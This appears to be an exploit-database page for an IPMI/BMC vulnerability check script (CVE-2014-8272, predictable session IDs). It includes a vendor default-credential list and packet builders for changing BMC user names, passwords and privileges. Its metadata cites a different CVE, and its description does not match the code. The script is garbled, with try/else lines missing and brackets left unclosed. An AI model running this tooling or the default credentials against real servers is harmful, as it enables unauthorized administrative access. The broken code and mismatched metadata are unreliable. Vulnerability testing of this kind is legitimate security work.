Suggest Exploit
Yong Chuan, Koh
Information Disclosure
Product Name: Unknown
Affected Version From: Unknown
Affected Version To: Unknown
Patch Exists: YES
Related CWE: CVE-2014-4878
CPE: a:-:ipmi_firmware:-
Other Scripts:
Platforms Tested:

IPMI Information Disclosure

This exploit allows an attacker to disclose sensitive information from the IPMI (Intelligent Platform Management Interface) protocol. By sending specific commands to the IPMI service, an attacker can retrieve information such as user access privileges, user names, and other configuration settings.


To mitigate this vulnerability, it is recommended to disable or restrict access to the IPMI service. Additionally, it is important to keep the IPMI firmware up to date and follow best practices for IPMI configuration.

Exploit-DB raw data:

For testing purposes only.

(c) Yong Chuan, Koh 2014

from time import sleep
from socket import *
from struct import *
from random import *
import sys, os, argparse 

HOST = None
PORT = 623

bufsize = 1024
recv = ""

# create socket
UDPsock = socket(AF_INET,SOCK_DGRAM)

data = 21	#offset of data start

RMCP = ('\x06' + 	#RMCP.version = ASF RMCP v1.0
	'\x00' +	#RMCP.reserved
	'\xFF' +	#RMCP.seq
	'\x07'		#RMCP.Type/Class = Normal_RMCP/IPMI

def SessionHeader (ipmi, auth_type='None', seq_num=0, sess_id=0, pwd=None):
	auth_types = {'None':0, 'MD2':1, 'MD5':2, 'Reserved':3, 'Straight Pwd':4, 'OEM':5}

	sess_header = ''
	sess_header += pack('<B', auth_types[auth_type])
	sess_header += pack('<L', seq_num)
	sess_header += pack('<L', sess_id)
	if auth_type is not 'None':
		raw = pwd + pack('<L', sess_id) + ipmi + pack('<L', seq_num) + pwd
		import hashlib
		h = hashlib.md5(raw)
		sess_header += h.digest()
	sess_header += pack('B', len(ipmi))
	return sess_header

class CreateIPMI ():
	def __init__ (self):
		self.priv_lvls = {'Reserved':0, 'Callback':1, 'User':2, 'Operator':3, 'Admin':4, 'OEM':5, 'NO ACCESS':15 }
		self.priv_lvls_2 = {0:'Reserved', 1:'Callback', 2:'User', 3:'Operator', 4:'Admin', 5:'OEM', 15:'NO ACCESS'}
		self.auth_types = {'None':0, 'MD2':1, 'MD5':2, 'Reserved':3, 'Straight Pwd':4, 'OEM':5}

	def CheckSum (self, bytes):

		chksum = 0
		q = ''
		for i in bytes:
			q += '%02X ' %ord(i)
			chksum = (chksum + ord(i)) % 0x100
		if chksum > 0:
			chksum = 0x100 - chksum

		return pack('>B', chksum)

	def Header (self, cmd, seq_num=0x00):
		#only for IPMI v1.5
		cmds = {'Get Channel Auth Capabilities'	: (0x06, 0x38), #(netfn, cmd_code)
			'Get Session Challenge'		: (0x06, 0x39), 
			'Activate Session'		: (0x06, 0x3a),
			'Set Session Privilege Level'	: (0x06, 0x3b),
			'Close Session'			: (0x06, 0x3c),
			'Set User Access'		: (0x06, 0x43),
			'Get User Access'		: (0x06, 0x44),
			'Set User Name'			: (0x06, 0x45),
			'Get User Name'			: (0x06, 0x46),
			'Set User Password'		: (0x06, 0x47),
			'Get Chassis Status'		: (0x00, 0x01)}
		ipmi_header = ''
		ipmi_header += pack('<B', 0x20)			#target addr
		ipmi_header += pack('<B', cmds[cmd][0]<<2 | 0) 	#netfn | target lun
		ipmi_header += self.CheckSum (ipmi_header)
		ipmi_header += pack('<B', 0x81)			#source addr
		ipmi_header += pack('<B', seq_num<<2 | 0)	#seq_num | source lun
		ipmi_header += pack('<B', cmds[cmd][1])		#IPMI message command

		return ipmi_header

	def GetChannelAuthenticationCapabilities (self, hdr_seq, chn=0x0E, priv_lvl='Admin'):
		ipmi = ''
		ipmi += self.Header('Get Channel Auth Capabilities', hdr_seq)
		ipmi += pack('<B', 0<<7 | chn)			#IPMI v1.5 | chn num (0-7, 14=current_chn, 15)
		ipmi += pack('<B', self.priv_lvls[priv_lvl])	#requested privilege level
		ipmi += self.CheckSum (ipmi[3:])
		return ipmi

	def GetSessionChallenge (self, hdr_seq, username, auth_type='MD5'):
		#only for IPMI v1.5
		ipmi = ''
		ipmi += self.Header('Get Session Challenge', hdr_seq)
		ipmi += pack('<B', self.auth_types[auth_type])	#authentication type
		ipmi += username				#user name
		ipmi += self.CheckSum(ipmi[3:])

		return ipmi

	def ActivateSession (self, hdr_seq, authcode, auth_type='MD5', priv_lvl='Admin'):
		#only for IPMI v1.5	
		ipmi = ''
		ipmi += self.Header('Activate Session', hdr_seq)
		ipmi += pack('>B', self.auth_types[auth_type])
		ipmi += pack('>B', self.priv_lvls[priv_lvl])
		ipmi += authcode		#challenge string
		ipmi += pack('<L', 0xdeadb0b0)	#initial outbound seq num
		ipmi += self.CheckSum(ipmi[3:])

		return ipmi

	def SetSessionPrivilegeLevel (self, hdr_seq, priv_lvl='Admin'):
		#only for IPMI v1.5
		ipmi = ''
		ipmi += self.Header('Set Session Privilege Level', hdr_seq)
		ipmi += pack('>B', self.priv_lvls[priv_lvl])
		ipmi += self.CheckSum(ipmi[3:])

		return ipmi

	def CloseSession (self, hdr_seq, sess_id):
		ipmi = ''
		ipmi += self.Header ("Close Session", hdr_seq)
		ipmi += pack('<L', sess_id)
		ipmi += self.CheckSum(ipmi[3:])

		return ipmi

	def GetChassisStatus (self, hdr_seq):
		ipmi = ''
		ipmi += self.Header ("Get Chassis Status", hdr_seq)
		ipmi += self.CheckSum(ipmi[3:])

		return ipmi

	def GetUserAccess (self, hdr_seq, user_id, chn_num=0x0E):
		ipmi = ''
		ipmi += self.Header ("Get User Access", hdr_seq)
		ipmi += pack('>B', chn_num)		#chn_num = 0x0E = current channel
		ipmi += pack('>B', user_id)
		ipmi += self.CheckSum(ipmi[3:])

		return ipmi

	def GetUserName (self, hdr_seq, user_id=2):
		ipmi = ''
		ipmi += self.Header ("Get User Name", hdr_seq)
		ipmi += pack('>B', user_id)
		ipmi += self.CheckSum(ipmi[3:])

		return ipmi

	def SetUserName (self, hdr_seq, user_id, user_name):
		#Assign user_name to user_id, replaces if user_id is occupied
		ipmi = ''
		ipmi += self.Header ("Set User Name", hdr_seq)
		ipmi += pack('>B', user_id)
		ipmi += user_name.ljust(16, '\x00')
		ipmi += self.CheckSum(ipmi[3:])

		return ipmi

	def SetUserPassword (self, hdr_seq, user_id, password, op='set password'):
		ops = {'disable user':0, 'enable user':1, 'set password':2, 'test password':3}
		ipmi = ''
		ipmi += self.Header ("Set User Password", hdr_seq)
		ipmi += pack('>B', user_id)
		ipmi += pack('>B', ops[op])
		ipmi += password.ljust(16, '\x00') #IPMI v1.5: 16bytes | IPMI v2.0: 20bytes
		ipmi += self.CheckSum(ipmi[3:])

		return ipmi

	def SetUserAccess (self, hdr_seq, user_id, new_priv, chn=0x0E):
		ipmi = ''
		ipmi += self.Header ("Set User Access", hdr_seq)
		ipmi += pack('<B', 1<<7 | 0<<6 | 0<<5 | 1<<4 | chn)	#bit4=1=enable user for IPMI Messaging | chn=0xE=current channel
		ipmi += pack('>B', user_id)
		ipmi += pack('>B', self.priv_lvls[new_priv])
		ipmi += pack('>B', 0)
		ipmi += self.CheckSum(ipmi[3:])

		return ipmi

def SendUDP (pkt):

	global HOST, PORT, data

	res = ''
	code = ipmi_seq = 0xFFFF
	for i in range(5):
			UDPsock.sendto(pkt, (HOST, PORT))
			res = UDPsock.recv(bufsize)
		except Exception as e:
			print '[-] Socket Timeout: Try %d'%i
			sleep (0)
			#have received a reply
			if res[4:5] == '\x02':		#Session->AuthType = MD5
				data += 16
			code 	= unpack('B',res[data-1:data])[0]
			ipmi_seq= unpack('B',res[data-3:data-2])[0]>>2
			if res[4:5] == '\x02':
				data -= 16
	return code, ipmi_seq, res

def SetUpSession (username, pwd, priv='Admin', auth='MD5'):

	global data

	#Get Channel Authentication Capabilities
	ipmi = CreateIPMI().GetChannelAuthenticationCapabilities(0, chn=0xE, priv_lvl=priv)
	code, ipmi_seq, res = SendUDP (RMCP + SessionHeader(ipmi) + ipmi)
	if code != 0x00:
		return code, 0, 0, 0
	#print '[+]%-30s: %02X (%d)'%('Get Chn Auth Capabilities', code, ipmi_seq)

	#Get Session Challenge
	ipmi = CreateIPMI().GetSessionChallenge(1, username, 'MD5')
	code, ipmi_seq, res = SendUDP (RMCP + SessionHeader(ipmi) + ipmi)
	if code != 0x00:
                if code == 0xFFFF:
                        print "[-] BMC didn't respond to IPMI v1.5 session setup"
                        print "    If firmware had disabled it, then BMC is not vulnerable"
		return code, 0, 0, 0
	temp_sess_id 	= unpack('<L', res[data:data+4])[0]
	challenge_str 	= res[data+4:data+4+16]
	#print '[+]%-30s: %02X (%d)'%('Get Session Challenge', code, ipmi_seq)

	#Activate Session
	ipmi = CreateIPMI().ActivateSession(2, challenge_str, auth, priv)
	code, ipmi_seq, res = SendUDP (RMCP + SessionHeader(ipmi, auth, 0, temp_sess_id, pwd) + ipmi)
	if code != 0x00:
		return code, 0, 0, 0
	data += 16
	sess_auth_type 			= unpack('B', res[data:data+1])[0]
	sess_id 			= unpack('<L', res[data+1:data+1+4])[0]
	ini_inbound = sess_hdr_seq 	= unpack('<L', res[data+5:data+5+4])[0]
	sess_priv_lvl 			= unpack('B', res[data+9:data+9+1])[0]
	#print '[+]%-30s: %02X (%d)'%('Activate Session', code, ipmi_seq)
	#print '   %-30s: Session_ID %08X'%sess_id
	data -= 16

	#Set Session Privilege Level
	ipmi = CreateIPMI().SetSessionPrivilegeLevel(3, priv)
	code, ipmi_seq, res = SendUDP (RMCP + SessionHeader(ipmi, 'None', sess_hdr_seq, sess_id) + ipmi)
	sess_hdr_seq += 1
	if code != 0x00:
		return code, 0, 0, 0
	new_priv_lvl = unpack('B', res[data:data+1])[0]
	#print '[+]%-30s: %02X (%d)'%('Set Session Priv Level', code, ipmi_seq)

	return code, temp_sess_id, sess_hdr_seq, sess_id

def CloseSession (sess_seq, sess_id):

	global data

	#Close Session
	ipmi = CreateIPMI().CloseSession(5, sess_id)
	code, ipmi_seq, res = SendUDP (RMCP + SessionHeader(ipmi, 'None', sess_seq, sess_id) + ipmi)
	#print '[+]%-30s: %02X (%d)'%('Close Session', code, ipmi_seq)

	return code

def CheckSessionAlive(sess_seq, sess_id):
	#SetUserPassword(): "user enable <user_id>"
	ipmi = CreateIPMI().GetChassisStatus(31)
	code, ipmi_seq, res = SendUDP (RMCP + SessionHeader(ipmi, 'None', sess_seq, sess_id) + ipmi)
	print '[+] %-35s: %02X (%d)'%('CheckSessionAlive->GetChassisStatus', code, ipmi_seq)
	sess_seq += 1
	return sess_seq

def banner():
        print ("######################################################\n"+\
               "## This tool checks whether a BMC machine is vulnerable to CVE-2014-8272\n"+\
               "## (http://www.kb.cert.org/vuls/id/843044)\n"+\
               "## by logging the TemporarySessionID/SessionID in each IPMI v1.5 session,\n"+\
               "## and checking that these values are incremental\n"+\
               "## \n"+\
               "## Author:  Yong Chuan, Koh\n"+\
               "## Email:   yongchuan.koh@mwrinfosecurity.com\n"+\
               "## (c) Yong Chuan, Koh 2014\n"+\

def main():

        #default usernames/passwords (https://community.rapid7.com/community/metasploit/blog/2013/07/02/a-penetration-testers-guide-to-ipmi)
        vendors = {"HP"         :{"user":"Administrator",       "pwd":""},     #no default pwd: <factory randomized 8-character string>
                   "DELL"       :{"user":"root",                "pwd":"calvin"},
                   "IBM"        :{"user":"USERID",              "pwd":"PASSW0RD"},
                   "FUJITSU"    :{"user":"admin",               "pwd":"admin"},
                   "SUPERMICRO" :{"user":"ADMIN",               "pwd":"ADMIN"},
                   "ORACLE"     :{"user":"root",                "pwd":"changeme"},
                   "ASUS"       :{"user":"admin",               "pwd":"admin"}
        arg = argparse.ArgumentParser(description="Test for CVE-2014-8272: Use of Insufficiently Random Values")
        arg.add_argument("-i", "--ip", required=True, help="IP address of BMC server")
        arg.add_argument("-u", "--udpport", nargs="?", default=623, type=int, help="Port of BMC server (optional: default 623)")
        arg.add_argument("-v", "--vendor", nargs="?", help="Server vendor of BMC (optional: for default BMC credentials)")
        arg.add_argument("-n", "--username", nargs="?", default=None, help="Username of BMC account (optional: for non-default credentials)")
        arg.add_argument("-p", "--password", nargs="?", default=None, help="Password of BMC account (optional: for non-default credentials)")

        args = arg.parse_args()

        if args.vendor is not None: args.vendor = args.vendor.upper()
        if (args.vendor is None or args.vendor not in vendors.keys()) and (args.username is None or args.password is None):
                print "[-] Error: -n and -p are required because -v is not specified/in default list"
                print "    Vendors with Default Accounts"
                print "    -----------------------------------"
                for vendor,acct in vendors.iteritems():
                        print "    %s: username='%s', password='%s'"%(vendor,acct["user"],acct["pwd"])
        if args.username is None:   args.username = vendors[args.vendor]["user"].ljust(16, '\x00')
        if args.password is None:   args.password = vendors[args.vendor]["pwd"].ljust(16, '\x00')

        global HOST, PORT
        HOST = args.ip  
        PORT = args.udpport

        print "Script Parameters"
        print "-------------------------"
        print "IP       : %s"%HOST                        
        print "Port     : %d"%PORT
        print "Username : %s"%args.username
        print "Password : %s"%args.password

        session_ids = []
        for i in xrange(0x80):  #do not go beyond 0xFF, because of how session_ids is checked for incremental later
                        code, temp_sess_id, sess_seq, sess_id = SetUpSession (args.username, args.password, priv='Admin', auth='MD5')
                        if code == 0:
                                print '[+%04X] temp_sess_id=%08X, sess_id=%08X'%(i, temp_sess_id, sess_id)
                                #print '[-%04X] SetUp Session: Trying again after timeout 5s'%(i)

                        code = CloseSession (sess_seq, sess_id)
                        if code == 0:
                                #print '[+%04X] Close Session OK'%(i)
                                i += 1
                                sleep (0.5)
                                #print '[-%04X] Close Session fail: Wait for natural timeout (60+/-3s)'%(i)

                except Exception as e:
                        exc_type, exc_obj, exc_tb = sys.exc_info()
                        fname = os.path.split(exc_tb.tb_frame.f_code.co_filename)[1]
                        print (exc_type, fname, exc_tb.tb_lineno)

        session_ids = session_ids[:0xFF]
        #get the first incremental diff
        const_diff = None
        for i in xrange(1, len(session_ids)):
                if session_ids[i-1] < session_ids[i]:
                        const_diff = session_ids[i] - session_ids[i-1]
        #check if session_ids are increasing at a fixed value
        vulnerable = True
        crossed_value_boundary = 0
        for i in xrange(1, len(session_ids)):

                if session_ids[i]-session_ids[i-1] != const_diff:
                        if crossed_value_boundary < 2:
                                crossed_value_boundary += 1
                                vulnerable = False

        if vulnerable:
                print "Conclusion: BMC is vulnerable to CVE-2014-8272"
                print "Conclusion: BMC is not vulnerable to CVE-2014-8272"


if __name__ == "__main__":